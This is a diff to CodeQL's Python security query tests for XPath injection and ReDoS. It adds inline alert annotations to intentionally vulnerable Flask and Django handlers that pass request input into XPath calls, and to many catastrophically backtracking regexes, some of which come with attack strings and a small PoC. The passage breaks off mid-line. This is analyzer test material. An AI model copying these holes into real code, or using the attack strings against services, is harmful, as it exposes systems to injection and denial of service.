4b1a2c40f7cf..6c13896e7884 100644 --- a/python/ql/test/query-tests/Security/CWE-643-XPathInjection/XpathInjection.expected +++ b/python/ql/test/query-tests/Security/CWE-643-XPathInjection/XpathInjection.expected @@ -1,3 +1,10 @@ +#select +| xpathBad.py:13:20:13:43 | ControlFlowNode for BinaryExpr | xpathBad.py:9:7:9:13 | ControlFlowNode for request | xpathBad.py:13:20:13:43 | ControlFlowNode for BinaryExpr | XPath expression depends on a $@. | xpathBad.py:9:7:9:13 | ControlFlowNode for request | user-provided value | +| xpathFlow.py:14:20:14:29 | ControlFlowNode for xpathQuery | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | xpathFlow.py:14:20:14:29 | ControlFlowNode for xpathQuery | XPath expression depends on a $@. | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | +| xpathFlow.py:23:29:23:38 | ControlFlowNode for xpathQuery | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | xpathFlow.py:23:29:23:38 | ControlFlowNode for xpathQuery | XPath expression depends on a $@. | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | +| xpathFlow.py:32:29:32:38 | ControlFlowNode for xpathQuery | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | xpathFlow.py:32:29:32:38 | ControlFlowNode for xpathQuery | XPath expression depends on a $@. | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | +| xpathFlow.py:41:31:41:40 | ControlFlowNode for xpathQuery | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | xpathFlow.py:41:31:41:40 | ControlFlowNode for xpathQuery | XPath expression depends on a $@. | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | +| xpathFlow.py:49:29:49:38 | ControlFlowNode for xpathQuery | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | xpathFlow.py:49:29:49:38 | ControlFlowNode for xpathQuery | XPath expression depends on a $@. | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | edges | xpathBad.py:9:7:9:13 | ControlFlowNode for request | xpathBad.py:10:5:10:9 | ControlFlowNode for value | provenance | AdditionalTaintStep | | xpathBad.py:10:5:10:9 | ControlFlowNode for value | xpathBad.py:13:20:13:43 | ControlFlowNode for BinaryExpr | provenance | | @@ -59,10 +66,3 @@ nodes | xpathFlow.py:47:18:47:44 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | | xpathFlow.py:49:29:49:38 | ControlFlowNode for xpathQuery | semmle.label | ControlFlowNode for xpathQuery | subpaths -#select -| xpathBad.py:13:20:13:43 | ControlFlowNode for BinaryExpr | xpathBad.py:9:7:9:13 | ControlFlowNode for request | xpathBad.py:13:20:13:43 | ControlFlowNode for BinaryExpr | XPath expression depends on a $@. | xpathBad.py:9:7:9:13 | ControlFlowNode for request | user-provided value | -| xpathFlow.py:14:20:14:29 | ControlFlowNode for xpathQuery | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | xpathFlow.py:14:20:14:29 | ControlFlowNode for xpathQuery | XPath expression depends on a $@. | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | -| xpathFlow.py:23:29:23:38 | ControlFlowNode for xpathQuery | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | xpathFlow.py:23:29:23:38 | ControlFlowNode for xpathQuery | XPath expression depends on a $@. | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | -| xpathFlow.py:32:29:32:38 | ControlFlowNode for xpathQuery | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | xpathFlow.py:32:29:32:38 | ControlFlowNode for xpathQuery | XPath expression depends on a $@. | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | -| xpathFlow.py:41:31:41:40 | ControlFlowNode for xpathQuery | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | xpathFlow.py:41:31:41:40 | ControlFlowNode for xpathQuery | XPath expression depends on a $@. | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | -| xpathFlow.py:49:29:49:38 | ControlFlowNode for xpathQuery | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | xpathFlow.py:49:29:49:38 | ControlFlowNode for xpathQuery | XPath expression depends on a $@. | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | diff --git a/python/ql/test/query-tests/Security/CWE-643-XPathInjection/XpathInjection.qlref b/python/ql/test/query-tests/Security/CWE-643-XPathInjection/XpathInjection.qlref index a61523e1767a..20ce4fdfd933 100644 --- a/python/ql/test/query-tests/Security/CWE-643-XPathInjection/XpathInjection.qlref +++ b/python/ql/test/query-tests/Security/CWE-643-XPathInjection/XpathInjection.qlref @@ -1 +1,2 @@ -Security/CWE-643/XpathInjection.ql +query: Security/CWE-643/XpathInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-643-XPathInjection/xpathBad.py b/python/ql/test/query-tests/Security/CWE-643-XPathInjection/xpathBad.py index ee836dd385eb..26a2f8d0d9a1 100644 --- a/python/ql/test/query-tests/Security/CWE-643-XPathInjection/xpathBad.py +++ b/python/ql/test/query-tests/Security/CWE-643-XPathInjection/xpathBad.py @@ -6,11 +6,11 @@ from django.template import Template, Context, Engine, engines -def a(request): +def a(request): # $ Source value = request.GET['xpath'] f = StringIO('') tree = etree.parse(f) - r = tree.xpath("/tag[@id='%s']" % value) + r = tree.xpath("/tag[@id='%s']" % value) # $ Alert urlpatterns = [ diff --git a/python/ql/test/query-tests/Security/CWE-643-XPathInjection/xpathFlow.py b/python/ql/test/query-tests/Security/CWE-643-XPathInjection/xpathFlow.py index c2fe2ce1edb3..0a4f97ce30e7 100644 --- a/python/ql/test/query-tests/Security/CWE-643-XPathInjection/xpathFlow.py +++ b/python/ql/test/query-tests/Security/CWE-643-XPathInjection/xpathFlow.py @@ -1,5 +1,5 @@ from io import StringIO -from flask import Flask, request +from flask import Flask, request # $ Source app = Flask(__name__) @@ -11,7 +11,7 @@ def xpath1(): xpathQuery = request.args.get('xml', '') f = StringIO('') tree = etree.parse(f) - r = tree.xpath(xpathQuery) + r = tree.xpath(xpathQuery) # $ Alert @app.route("/xpath2") @@ -20,7 +20,7 @@ def xpath2(): xpathQuery = request.args.get('xml', '') root = etree.XML("TEXT") - find_text = etree.XPath(xpathQuery) + find_text = etree.XPath(xpathQuery) # $ Alert text = find_text(root)[0] @@ -29,7 +29,7 @@ def xpath3(): from lxml import etree xpathQuery = request.args.get('xml', '') root = etree.XML("TEXT") - find_text = etree.XPath(xpathQuery, smart_strings=False) + find_text = etree.XPath(xpathQuery, smart_strings=False) # $ Alert text = find_text(root)[0] @@ -38,7 +38,7 @@ def xpath4(): from lxml import etree xpathQuery = request.args.get('xml', '') root = etree.XML("TEXT") - find_text = etree.ETXPath(xpathQuery) + find_text = etree.ETXPath(xpathQuery) # $ Alert text = find_text(root)[0] @app.route("/xpath5") @@ -46,4 +46,4 @@ def xpath5(): import libxml2 xpathQuery = request.args.get('xml', '') doc = libxml2.parseFile('xpath_injection/credential.xml') - results = doc.xpathEval(xpathQuery) + results = doc.xpathEval(xpathQuery) # $ Alert diff --git a/python/ql/test/query-tests/Security/CWE-730-PolynomialReDoS/PolynomialReDoS.expected b/python/ql/test/query-tests/Security/CWE-730-PolynomialReDoS/PolynomialReDoS.expected index aa8cea07ed16..22fcfd05fa19 100644 --- a/python/ql/test/query-tests/Security/CWE-730-PolynomialReDoS/PolynomialReDoS.expected +++ b/python/ql/test/query-tests/Security/CWE-730-PolynomialReDoS/PolynomialReDoS.expected @@ -1,3 +1,9 @@ +#select +| test.py:8:30:8:33 | ControlFlowNode for text | test.py:2:26:2:32 | ControlFlowNode for ImportMember | test.py:8:30:8:33 | ControlFlowNode for text | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | test.py:8:19:8:21 | \\s+ | regular expression | test.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:9:32:9:35 | ControlFlowNode for text | test.py:2:26:2:32 | ControlFlowNode for ImportMember | test.py:9:32:9:35 | ControlFlowNode for text | This $@ that depends on a $@ may run slow on strings starting with '0.9' and with many repetitions of '99'. | test.py:9:25:9:27 | \\d+ | regular expression | test.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:12:17:12:20 | ControlFlowNode for text | test.py:2:26:2:32 | ControlFlowNode for ImportMember | test.py:12:17:12:20 | ControlFlowNode for text | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | test.py:11:29:11:31 | \\s+ | regular expression | test.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:16:24:16:30 | ControlFlowNode for my_text | test.py:2:26:2:32 | ControlFlowNode for ImportMember | test.py:16:24:16:30 | ControlFlowNode for my_text | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | test.py:18:21:18:23 | \\s+ | regular expression | test.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:21:18:21:21 | ControlFlowNode for text | test.py:2:26:2:32 | ControlFlowNode for ImportMember | test.py:21:18:21:21 | ControlFlowNode for text | This $@ that depends on a $@ may run slow on strings starting with 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC' and with many repetitions of 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC'. | test.py:20:271:20:272 | .* | regular expression | test.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | edges | test.py:2:26:2:32 | ControlFlowNode for ImportMember | test.py:2:26:2:32 | ControlFlowNode for request | provenance | | | test.py:2:26:2:32 | ControlFlowNode for request | test.py:7:12:7:18 | ControlFlowNode for request | provenance | | @@ -26,9 +32,3 @@ nodes | test.py:18:28:18:31 | ControlFlowNode for text | semmle.label | ControlFlowNode for text | | test.py:21:18:21:21 | ControlFlowNode for text | semmle.label | ControlFlowNode for text | subpaths -#select -| test.py:8:30:8:33 | ControlFlowNode for text | test.py:2:26:2:32 | ControlFlowNode for ImportMember | test.py:8:30:8:33 | ControlFlowNode for text | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | test.py:8:19:8:21 | \\s+ | regular expression | test.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:9:32:9:35 | ControlFlowNode for text | test.py:2:26:2:32 | ControlFlowNode for ImportMember | test.py:9:32:9:35 | ControlFlowNode for text | This $@ that depends on a $@ may run slow on strings starting with '0.9' and with many repetitions of '99'. | test.py:9:25:9:27 | \\d+ | regular expression | test.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:12:17:12:20 | ControlFlowNode for text | test.py:2:26:2:32 | ControlFlowNode for ImportMember | test.py:12:17:12:20 | ControlFlowNode for text | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | test.py:11:29:11:31 | \\s+ | regular expression | test.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:16:24:16:30 | ControlFlowNode for my_text | test.py:2:26:2:32 | ControlFlowNode for ImportMember | test.py:16:24:16:30 | ControlFlowNode for my_text | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | test.py:18:21:18:23 | \\s+ | regular expression | test.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:21:18:21:21 | ControlFlowNode for text | test.py:2:26:2:32 | ControlFlowNode for ImportMember | test.py:21:18:21:21 | ControlFlowNode for text | This $@ that depends on a $@ may run slow on strings starting with 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC' and with many repetitions of 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC'. | test.py:20:271:20:272 | .* | regular expression | test.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | diff --git a/python/ql/test/query-tests/Security/CWE-730-PolynomialReDoS/PolynomialReDoS.qlref b/python/ql/test/query-tests/Security/CWE-730-PolynomialReDoS/PolynomialReDoS.qlref index 8c457eb7467e..1847f552d933 100644 --- a/python/ql/test/query-tests/Security/CWE-730-PolynomialReDoS/PolynomialReDoS.qlref +++ b/python/ql/test/query-tests/Security/CWE-730-PolynomialReDoS/PolynomialReDoS.qlref @@ -1 +1,2 @@ -Security/CWE-730/PolynomialReDoS.ql +query: Security/CWE-730/PolynomialReDoS.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-730-PolynomialReDoS/test.py b/python/ql/test/query-tests/Security/CWE-730-PolynomialReDoS/test.py index 622fa6803b90..bb0a53e4d14e 100644 --- a/python/ql/test/query-tests/Security/CWE-730-PolynomialReDoS/test.py +++ b/python/ql/test/query-tests/Security/CWE-730-PolynomialReDoS/test.py @@ -1,22 +1,22 @@ import re -from flask import Flask, request +from flask import Flask, request # $ Source app = Flask(__name__) @app.route("/poly-redos") def code_execution(): text = request.args.get("text") - re.sub(r"^\s+|\s+$", "", text) # NOT OK - re.match(r"^0\.\d+E?\d+$", text) # NOT OK + re.sub(r"^\s+|\s+$", "", text) # NOT OK # $ Alert + re.match(r"^0\.\d+E?\d+$", text) # NOT OK # $ Alert reg = re.compile(r"^\s+|\s+$") - reg.sub("", text) # NOT OK + reg.sub("", text) # NOT OK # $ Alert def indirect(input_reg_str, my_text): my_reg = re.compile(input_reg_str) - my_reg.sub("", my_text) # NOT OK + my_reg.sub("", my_text) # NOT OK # $ Alert indirect(r"^\s+|\s+$", text) reg2 = re.compile(r"(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)C.*Y") - reg2.sub("", text) # NOT OK + reg2.sub("", text) # NOT OK # $ Alert diff --git a/python/ql/test/query-tests/Security/CWE-730-ReDoS/KnownCVEs.py b/python/ql/test/query-tests/Security/CWE-730-ReDoS/KnownCVEs.py index 14a8ff528090..6e63bf28f3c1 100644 --- a/python/ql/test/query-tests/Security/CWE-730-ReDoS/KnownCVEs.py +++ b/python/ql/test/query-tests/Security/CWE-730-ReDoS/KnownCVEs.py @@ -12,7 +12,7 @@ toFlag = re.compile(newline) # https://github.com/github/codeql-python-CVE-coverage/issues/400 -re.compile(r'[+-]?(\d+)*\.\d+%?') +re.compile(r'[+-]?(\d+)*\.\d+%?') # $ Alert re.compile(r'"""\s+(?:.|\n)*?\s+"""') re.compile(r'(\{\s+)(\S+)(\s+[^}]+\s+\}\s)') re.compile(r'".*``.*``.*"') @@ -27,12 +27,12 @@ simple_email_re = re.compile(r"^\S+@[a-zA-Z0-9._-]+\.[a-zA-Z0-9._-]+$") # https://github.com/github/codeql-python-CVE-coverage/issues/249 -rx = re.compile('(?:.*,)*[ \t]*([^ \t]+)[ \t]+' +rx = re.compile('(?:.*,)*[ \t]*([^ \t]+)[ \t]+' # $ Alert 'realm=(["\']?)([^"\']*)\\2', re.I) # https://github.com/github/codeql-python-CVE-coverage/issues/248 gauntlet = re.compile( - r"""^([-/:,#%.'"\s!\w]|\w-\w|'[\s\w]+'\s*|"[\s\w]+"|\([\d,%\.\s]+\))*$""", + r"""^([-/:,#%.'"\s!\w]|\w-\w|'[\s\w]+'\s*|"[\s\w]+"|\([\d,%\.\s]+\))*$""", # $ Alert flags=re.U ) diff --git a/python/ql/test/query-tests/Security/CWE-730-ReDoS/ReDoS.qlref b/python/ql/test/query-tests/Security/CWE-730-ReDoS/ReDoS.qlref index 4c19d395edbe..2cc0b9cb67cb 100644 --- a/python/ql/test/query-tests/Security/CWE-730-ReDoS/ReDoS.qlref +++ b/python/ql/test/query-tests/Security/CWE-730-ReDoS/ReDoS.qlref @@ -1 +1,2 @@ -Security/CWE-730/ReDoS.ql +query: Security/CWE-730/ReDoS.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-730-ReDoS/redos.py b/python/ql/test/query-tests/Security/CWE-730-ReDoS/redos.py index 4aad94021e40..736bb5a936e5 100644 --- a/python/ql/test/query-tests/Security/CWE-730-ReDoS/redos.py +++ b/python/ql/test/query-tests/Security/CWE-730-ReDoS/redos.py @@ -3,7 +3,7 @@ # NOT GOOD; attack: "_" + "__".repeat(100) # Adapted from marked (https://github.com/markedjs/marked), which is licensed # under the MIT license; see file marked-LICENSE. -bad1 = re.compile(r'''^\b_((?:__|[\s\S])+?)_\b|^\*((?:\*\*|[\s\S])+?)\*(?!\*)''') +bad1 = re.compile(r'''^\b_((?:__|[\s\S])+?)_\b|^\*((?:\*\*|[\s\S])+?)\*(?!\*)''') # $ Alert # GOOD # Adapted from marked (https://github.com/markedjs/marked), which is licensed @@ -18,7 +18,7 @@ # NOT GOOD; attack: " '" + "\\\\".repeat(100) # Adapted from CodeMirror (https://github.com/codemirror/codemirror), # which is licensed under the MIT license; see file CodeMirror-LICENSE. -bad2 = re.compile(r'''^(?:\s+(?:"(?:[^"\\]|\\\\|\\.)+"|'(?:[^'\\]|\\\\|\\.)+'|\((?:[^)\\]|\\\\|\\.)+\)))?''') +bad2 = re.compile(r'''^(?:\s+(?:"(?:[^"\\]|\\\\|\\.)+"|'(?:[^'\\]|\\\\|\\.)+'|\((?:[^)\\]|\\\\|\\.)+\)))?''') # $ Alert # GOOD # Adapted from lulucms2 (https://github.com/yiifans/lulucms2). @@ -30,53 +30,53 @@ good3 = re.compile(r'''^ *(\S.*\|.*)\n *([-:]+ *\|[-| :]*)\n((?:.*\|.*(?:\n|$))*)\n*''') # NOT GOOD, variant of good3; attack: "a|\n:|\n" + "||\n".repeat(100) -bad4 = re.compile(r'''^ *(\S.*\|.*)\n *([-:]+ *\|[-| :]*)\n((?:.*\|.*(?:\n|$))*)a''') +bad4 = re.compile(r'''^ *(\S.*\|.*)\n *([-:]+ *\|[-| :]*)\n((?:.*\|.*(?:\n|$))*)a''') # $ Alert # NOT GOOD; attack: "/" + "\\/a".repeat(100) # Adapted from ANodeBlog (https://github.com/gefangshuai/ANodeBlog), # which is licensed under the Apache License 2.0; see file ANodeBlog-LICENSE. -bad5 = re.compile(r'''\/(?![ *])(\\\/|.)*?\/[gim]*(?=\W|$)''') +bad5 = re.compile(r'''\/(?![ *])(\\\/|.)*?\/[gim]*(?=\W|$)''') # $ Alert # NOT GOOD; attack: "##".repeat(100) + "\na" # Adapted from CodeMirror (https://github.com/codemirror/codemirror), # which is licensed under the MIT license; see file CodeMirror-LICENSE. -bad6 = re.compile(r'''^([\s\[\{\(]|#.*)*$''') +bad6 = re.compile(r'''^([\s\[\{\(]|#.*)*$''') # $ Alert # GOOD good4 = re.compile(r'''(\r\n|\r|\n)+''') # BAD - PoC: `node -e "/((?:[^\"\']|\".*?\"|\'.*?\')*?)([(,)]|$)/.test(\"'''''''''''''''''''''''''''''''''''''''''''''\\\"\");"`. It's complicated though, because the regexp still matches something, it just matches the empty-string after the attack string. -actuallyBad = re.compile(r'''((?:[^"']|".*?"|'.*?')*?)([(,)]|$)''') +actuallyBad = re.compile(r'''((?:[^"']|".*?"|'.*?')*?)([(,)]|$)''') # $ Alert # NOT GOOD; attack: "a" + "[]".repeat(100) + ".b\n" # Adapted from Knockout (https://github.com/knockout/knockout), which is # licensed under the MIT license; see file knockout-LICENSE -bad6 = re.compile(r'''^[\_$a-z][\_$a-z0-9]*(\[.*?\])*(\.[\_$a-z][\_$a-z0-9]*(\[.*?\])*)*$''') +bad6 = re.compile(r'''^[\_$a-z][\_$a-z0-9]*(\[.*?\])*(\.[\_$a-z][\_$a-z0-9]*(\[.*?\])*)*$''') # $ Alert # GOOD good6 = re.compile(r'''(a|.)*''') # Testing the NFA - only some of the below are detected. -bad7 = re.compile(r'''^([a-z]+)+$''') -bad8 = re.compile(r'''^([a-z]*)*$''') -bad9 = re.compile(r'''^([a-zA-Z0-9])(([\\-.]|[_]+)?([a-zA-Z0-9]+))*(@){1}[a-z0-9]+[.]{1}(([a-z]{2,3})|([a-z]{2,3}[.]{1}[a-z]{2,3}))$''') -bad10 = re.compile(r'''^(([a-z])+.)+[A-Z]([a-z])+$''') +bad7 = re.compile(r'''^([a-z]+)+$''') # $ Alert +bad8 = re.compile(r'''^([a-z]*)*$''') # $ Alert +bad9 = re.compile(r'''^([a-zA-Z0-9])(([\\-.]|[_]+)?([a-zA-Z0-9]+))*(@){1}[a-z0-9]+[.]{1}(([a-z]{2,3})|([a-z]{2,3}[.]{1}[a-z]{2,3}))$''') # $ Alert +bad10 = re.compile(r'''^(([a-z])+.)+[A-Z]([a-z])+$''') # $ Alert # NOT GOOD; attack: "[" + "][".repeat(100) + "]!" # Adapted from Prototype.js (https://github.com/prototypejs/prototype), which # is licensed under the MIT license; see file Prototype.js-LICENSE. -bad11 = re.compile(r'''(([\w#:.~>+()\s-]+|\*|\[.*?\])+)\s*(,|$)''') +bad11 = re.compile(r'''(([\w#:.~>+()\s-]+|\*|\[.*?\])+)\s*(,|$)''') # $ Alert # NOT GOOD; attack: "'" + "\\a".repeat(100) + '"' # Adapted from Prism (https://github.com/PrismJS/prism), which is licensed # under the MIT license; see file Prism-LICENSE. -bad12 = re.compile(r'''("|')(\\?.)*?\1''') +bad12 = re.compile(r'''("|')(\\?.)*?\1''') # $ Alert # NOT GOOD -bad13 = re.compile(r'''(b|a?b)*c''') +bad13 = re.compile(r'''(b|a?b)*c''') # $ Alert # NOT GOOD -bad15 = re.compile(r'''(a|aa?)*b''') +bad15 = re.compile(r'''(a|aa?)*b''') # $ Alert # GOOD good7 = re.compile(r'''(.|\n)*!''') @@ -88,31 +88,31 @@ good8 = re.compile(r'''([\w.]+)*''') # NOT GOOD -bad17 = re.compile(r'''(a|aa?)*b''') +bad17 = re.compile(r'''(a|aa?)*b''') # $ Alert # GOOD - not used as regexp good9 = '(a|aa?)*b' # NOT GOOD -bad18 = re.compile(r'''(([\s\S]|[^a])*)"''') +bad18 = re.compile(r'''(([\s\S]|[^a])*)"''') # $ Alert # GOOD - there is no witness in the end that could cause the regexp to not match good10 = re.compile(r'''([^"']+)*''') # NOT GOOD -bad20 = re.compile(r'''((.|[^a])*)"''') +bad20 = re.compile(r'''((.|[^a])*)"''') # $ Alert # GOOD good10 = re.compile(r'''((a|[^a])*)"''') # NOT GOOD -bad21 = re.compile(r'''((b|[^a])*)"''') +bad21 = re.compile(r'''((b|[^a])*)"''') # $ Alert # NOT GOOD -bad22 = re.compile(r'''((G|[^a])*)"''') +bad22 = re.compile(r'''((G|[^a])*)"''') # $ Alert # NOT GOOD -bad23 = re.compile(r'''(([0-9]|[^a])*)"''') +bad23 = re.compile(r'''(([0-9]|[^a])*)"''') # $ Alert # NOT GOOD bad24 = re.compile(r'''(?:=(?:([!#\$%&'\*\+\-\.\^_`\|~0-9A-Za-z]+)|"((?:\\[\x00-\x7f]|[^\x00-\x08\x0a-\x1f\x7f"])*)"))?''') @@ -124,55 +124,55 @@ bad26 = re.compile(r'''"((?:\\[\x00-\x7f]|[^\x00-\x08\x0a-\x1f\x7f"\\])*)"''') # NOT GOOD -bad27 = re.compile(r'''(([a-z]|[d-h])*)"''') +bad27 = re.compile(r'''(([a-z]|[d-h])*)"''') # $ Alert # NOT GOOD -bad27 = re.compile(r'''(([^a-z]|[^0-9])*)"''') +bad27 = re.compile(r'''(([^a-z]|[^0-9])*)"''') # $ Alert # NOT GOOD -bad28 = re.compile(r'''((\d|[0-9])*)"''') +bad28 = re.compile(r'''((\d|[0-9])*)"''') # $ Alert # NOT GOOD -bad29 = re.compile(r'''((\s|\s)*)"''') +bad29 = re.compile(r'''((\s|\s)*)"''') # $ Alert # NOT GOOD -bad30 = re.compile(r'''((\w|G)*)"''') +bad30 = re.compile(r'''((\w|G)*)"''') # $ Alert # GOOD good11 = re.compile(r'''((\s|\d)*)"''') # NOT GOOD -bad31 = re.compile(r'''((\d|\w)*)"''') +bad31 = re.compile(r'''((\d|\w)*)"''') # $ Alert # NOT GOOD -bad32 = re.compile(r'''((\d|5)*)"''') +bad32 = re.compile(r'''((\d|5)*)"''') # $ Alert # NOT GOOD -bad33 = re.compile(r'''((\s|[\f])*)"''') +bad33 = re.compile(r'''((\s|[\f])*)"''') # $ Alert # NOT GOOD -bad34 = re.compile(r'''((\s|[\v]|\\v)*)"''') +bad34 = re.compile(r'''((\s|[\v]|\\v)*)"''') # $ Alert # NOT GOOD -bad35 = re.compile(r'''((\f|[\f])*)"''') +bad35 = re.compile(r'''((\f|[\f])*)"''') # $ Alert # NOT GOOD -bad36 = re.compile(r'''((\W|\D)*)"''') +bad36 = re.compile(r'''((\W|\D)*)"''') # $ Alert # NOT GOOD -bad37 = re.compile(r'''((\S|\w)*)"''') +bad37 = re.compile(r'''((\S|\w)*)"''') # $ Alert # NOT GOOD -bad38 = re.compile(r'''((\S|[\w])*)"''') +bad38 = re.compile(r'''((\S|[\w])*)"''') # $ Alert # NOT GOOD -bad39 = re.compile(r'''((1s|[\da-z])*)"''') +bad39 = re.compile(r'''((1s|[\da-z])*)"''') # $ Alert # NOT GOOD -bad40 = re.compile(r'''((0|[\d])*)"''') +bad40 = re.compile(r'''((0|[\d])*)"''') # $ Alert # NOT GOOD -bad41 = re.compile(r'''(([\d]+)*)"''') +bad41 = re.compile(r'''(([\d]+)*)"''') # $ Alert # GOOD - there is no witness in the end that could cause the regexp to not match good12 = re.compile(r'''(\d+(X\d+)?)+''') @@ -184,49 +184,49 @@ good15 = re.compile(r'''^([^>]+)*(>|$)''') # NOT GOOD -bad43 = re.compile(r'''^([^>a]+)*(>|$)''') +bad43 = re.compile(r'''^([^>a]+)*(>|$)''') # $ Alert # NOT GOOD -bad44 = re.compile(r'''(\n\s*)+$''') +bad44 = re.compile(r'''(\n\s*)+$''') # $ Alert # NOT GOOD -bad45 = re.compile(r'''^(?:\s+|#.*|\(\?#[^)]*\))*(?:[?*+]|{\d+(?:,\d*)?})''') +bad45 = re.compile(r'''^(?:\s+|#.*|\(\?#[^)]*\))*(?:[?*+]|{\d+(?:,\d*)?})''') # $ Alert # NOT GOOD -bad46 = re.compile(r'''\{\[\s*([a-zA-Z]+)\(([a-zA-Z]+)\)((\s*([a-zA-Z]+)\: ?([ a-zA-Z{}]+),?)+)*\s*\]\}''') +bad46 = re.compile(r'''\{\[\s*([a-zA-Z]+)\(([a-zA-Z]+)\)((\s*([a-zA-Z]+)\: ?([ a-zA-Z{}]+),?)+)*\s*\]\}''') # $ Alert # NOT GOOD -bad47 = re.compile(r'''(a+|b+|c+)*c''') +bad47 = re.compile(r'''(a+|b+|c+)*c''') # $ Alert # NOT GOOD -bad48 = re.compile(r'''(((a+a?)*)+b+)''') +bad48 = re.compile(r'''(((a+a?)*)+b+)''') # $ Alert # NOT GOOD -bad49 = re.compile(r'''(a+)+bbbb''') +bad49 = re.compile(r'''(a+)+bbbb''') # $ Alert # GOOD good16 = re.compile(r'''(a+)+aaaaa*a+''') # NOT GOOD -bad50 = re.compile(r'''(a+)+aaaaa$''') +bad50 = re.compile(r'''(a+)+aaaaa$''') # $ Alert # GOOD good17 = re.compile(r'''(\n+)+\n\n''') # NOT GOOD -bad51 = re.compile(r'''(\n+)+\n\n$''') +bad51 = re.compile(r'''(\n+)+\n\n$''') # $ Alert # NOT GOOD -bad52 = re.compile(r'''([^X]+)*$''') +bad52 = re.compile(r'''([^X]+)*$''') # $ Alert # NOT GOOD -bad53 = re.compile(r'''(([^X]b)+)*$''') +bad53 = re.compile(r'''(([^X]b)+)*$''') # $ Alert # GOOD good18 = re.compile(r'''(([^X]b)+)*($|[^X]b)''') # NOT GOOD -bad54 = re.compile(r'''(([^X]b)+)*($|[^X]c)''') +bad54 = re.compile(r'''(([^X]b)+)*($|[^X]c)''') # $ Alert # GOOD good20 = re.compile(r'''((ab)+)*ababab''') @@ -238,13 +238,13 @@ good22 = re.compile(r'''((ab)+)*''') # NOT GOOD -bad55 = re.compile(r'''((ab)+)*$''') +bad55 = re.compile(r'''((ab)+)*$''') # $ Alert # GOOD good23 = re.compile(r'''((ab)+)*[a1][b1][a2][b2][a3][b3]''') # NOT GOOD -bad56 = re.compile(r'''([\n\s]+)*(.)''') +bad56 = re.compile(r'''([\n\s]+)*(.)''') # $ Alert # GOOD - any witness passes through the accept state. good24 = re.compile(r'''(A*A*X)*''') @@ -253,76 +253,76 @@ good26 = re.compile(r'''([^\\\]]+)*''') # NOT GOOD -bad59 = re.compile(r'''(\w*foobarbaz\w*foobarbaz\w*foobarbaz\w*foobarbaz\s*foobarbaz\d*foobarbaz\w*)+-''') +bad59 = re.compile(r'''(\w*foobarbaz\w*foobarbaz\w*foobarbaz\w*foobarbaz\s*foobarbaz\d*foobarbaz\w*)+-''') # $ Alert # NOT GOOD -bad60 = re.compile(r'''(.thisisagoddamnlongstringforstresstestingthequery|\sthisisagoddamnlongstringforstresstestingthequery)*-''') +bad60 = re.compile(r'''(.thisisagoddamnlongstringforstresstestingthequery|\sthisisagoddamnlongstringforstresstestingthequery)*-''') # $ Alert # NOT GOOD -bad61 = re.compile(r'''(thisisagoddamnlongstringforstresstestingthequery|this\w+query)*-''') +bad61 = 